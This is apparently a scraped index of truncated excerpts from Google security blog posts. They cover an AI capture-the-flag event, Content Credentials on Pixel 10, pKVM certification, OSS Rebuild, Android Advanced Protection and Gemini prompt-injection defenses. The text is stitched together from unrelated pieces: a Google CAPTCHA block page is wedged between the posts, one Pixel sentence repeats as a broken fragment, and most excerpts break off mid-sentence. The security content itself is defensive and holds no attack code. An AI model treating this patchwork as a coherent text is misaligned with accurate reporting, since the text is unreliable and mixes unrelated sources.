Our goal was to create a fun, interactive environment, where participants across various skill levels could explore how AI can accelerate their daily cybersecurity workflows.

An overwhelming 85% of all participants found the event useful for learning how AI can be applied to security workflows.

This positive feedback highlights that AI-centric CTFs can play a vital role in speeding up AI education and adoption in the security community.

We are committed to advancing the AI cybersecurity frontier…

This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the Terms of Service .

The block will expire shortly after those requests stop.

In the meantime, solving the above CAPTCHA will let you continue to use our services.This traffic may have been sent by malicious software, a browser plug-in, or a script that sends automated requests.

If you share your network connection, ask your administrator for help — a different computer using the same IP address may be responsible.

Learn more Sometimes you may be asked to solve the CAPTCHA if you are using advanced terms that robots are known to use, or sending requests very qu…

At Made by Google 2025, we announced that the new Google Pixel 10 phones will support C2PA Content Credentials in Pixel Camera and Google Photos.

Pixel Camera attaches Content Credentials to any JPEG photo capture, with the appropriate description as defined by the Content Credentials specification for each capture mode.

attaches Content Credentials to any JPEG photo capture, with the appropriate description as defined by the Content Credentials specification for each capture mode.

Google Photos attaches Content Credentials to JPEG images that already have Content Credentials and are edited using AI or non-AI tools, and also to any images that are edited using AI tools.

Building a More Trus…

Today marks a watershed moment and new benchmark for open-source security and the future of consumer electronics.

Google is proud to announce that protected KVM (pKVM), the hypervisor that powers the Android Virtualization Framework, has officially achieved SESIP Level 5 certification.

This makes pKVM the first software security system designed for large-scale deployment in consumer electronics to meet this assurance bar.

With this level of security assurance, Android is now positioned to securely support the next generation of high-criticality isolated workloads.

Achieving Security Evaluation Standard for IoT Platforms (SESIP) Level 5 is a landmark because it incorporates AVA_VAN.5, the hi…

Today we're excited to announce OSS Rebuild, a new project to strengthen trust in open source package ecosystems by reproducing upstream artifacts.

Infrastructure definitions to allow organizations to easily run their own instances of OSS Rebuild to rebuild, generate, sign, and distribute provenance.

With an estimated value exceeding $12 trillion, open source software has never been more integral to the global economy.

For publishers and maintainers of open source packages, OSS Rebuild can...

If you're a developer, enterprise, or security researcher interested in OSS security, we invite you to follow along and get involved!

Android recently announced Advanced Protection, which extends Google’s Advanced Protection Program to a device-level security setting for Android users that need heightened security—such as journalists, elected officials, and public figures.

This is particularly useful for Advanced Protection users, since in 2023, plaintext HTTP was used as an exploitation vector during the Egyptian election.

JavaScript Optimizations and Security Advanced Protection reduces the attack surface of Chrome by disabling the higher-level optimizing Javascript compilers inside V8.

Javascript optimizers can be disabled outside of Advanced Protection Mode via the “Javascript optimization & security” Site Setting.

We…

Below we describe our prompt injection mitigation product strategy based on extensive research, development, and deployment of improved security mitigations.

A layered security approachGoogle has taken a layered security approach introducing security measures designed for each stage of the prompt lifecycle.

From there, a key protection against prompt injection and data exfiltration attacks occurs at the URL level.

Users are encouraged to become more familiar with our prompt injection defenses by reading the Help Center article.

Moving forwardOur comprehensive prompt injection security strategy strengthens the overall security framework for Gemini.